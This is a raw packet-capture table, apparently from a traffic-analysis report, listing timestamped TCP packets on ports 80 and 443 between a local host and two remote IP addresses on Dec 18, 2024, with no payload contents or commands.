                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.929189920 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931586027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931699038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.931890011 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934021950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934262991 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.934376001 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936536074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936636925 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.936697960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071717978 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071773052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.071834087 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072567940 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072699070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.072752953 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073461056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073587894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.073594093 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074357033 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074397087 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.074546099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075246096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075292110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.075437069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076160908 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076215982 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.076314926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077089071 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077131033 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077215910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077944040 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.077995062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078083992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078864098 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.078964949 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079122066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079808950 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079849005 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.079909086 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080698013 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080745935 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.080848932 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081608057 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081655979 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.081713915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082387924 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082530975 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.082551003 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083347082 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083518028 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.083571911 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084163904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084214926 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.084352970 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085160971 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085218906 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.085270882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.120959044 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.120970964 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.121233940 CET49805443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.121238947 CET44349805150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206475019 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206533909 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206629038 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.206943989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207056046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207139969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207823992 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207880974 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.207958937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208719015 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208765030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.208841085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209629059 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209678888 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.209744930 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210572004 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210625887 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.210684061 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211410046 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211457968 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.211524963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212485075 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212544918 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.212562084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213464022 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213509083 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.213526011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214483976 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214529037 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.214586020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226795912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226887941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.226887941 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227063894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227121115 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.227324963 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228065014 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228279114 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228331089 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228888988 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.228943110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229010105 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229758024 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229819059 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.229912996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230637074 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230783939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.230829954 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.403492928 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.403604031 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404156923 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404292107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.404337883 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405191898 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405422926 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.405596018 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406047106 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406101942 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.406331062 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418442011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418584108 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418647051 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.418860912 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419255018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419301033 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.419641018 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420196056 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420304060 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.420443058 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421010971 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421145916 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421197891 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421730995 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421838999 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.421875000 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422631979 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422677040 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.422791958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423559904 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423619032 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.423660994 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424441099 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424484015 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.424552917 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425318956 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425365925 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.425606012 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426249027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426342964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.426390886 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427117109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427170038 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.427246094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428028107 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428101063 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428153992 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428926945 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.428989887 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429028034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429816008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429867983 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.429891109 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430649996 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430699110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.430784941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431608915 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431658030 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.431767941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432478905 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432544947 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.432563066 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433356047 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433410883 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.433450937 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434242964 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434290886 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.434360027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435127020 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435168982 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.435225010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436022043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436136961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436160088 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436892986 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.436940908 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437009096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437797070 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437846899 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.437961102 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438730001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438781977 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.438832045 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439587116 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439647913 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.439743042 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440473080 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440511942 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.440623999 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441430092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441484928 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.441526890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442290068 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442348957 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.442476034 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443180084 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443234921 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.443274975 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.444072008 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.627525091 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628251076 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628388882 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.628545046 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629081011 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629229069 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629295111 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.629985094 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630145073 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630814075 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.630888939 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631059885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631117105 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631769896 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631915092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.631966114 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632682085 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632814884 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.632877111 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633605003 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633766890 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.633812904 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634455919 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634588957 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.634661913 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635356903 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635503054 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.635565996 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636279106 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636415958 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.636514902 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637156010 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637280941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.637339115 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638082027 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638225079 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638287067 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.638993025 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639170885 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639224052 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639843941 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.639993906 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640048027 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640731096 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640830994 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.640877962 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641865969 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641936064 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.641999960 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642668962 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642744064 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.642806053 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643559933 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643683910 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.643980980 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644373894 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644443989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.644606113 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645251989 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645363092 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.645481110 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646195889 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646275043 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646389961 CET4980280192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.646981001 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647171021 CET8049802139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:24.647233963 CET4980280192.168.2.6139.99.188.124
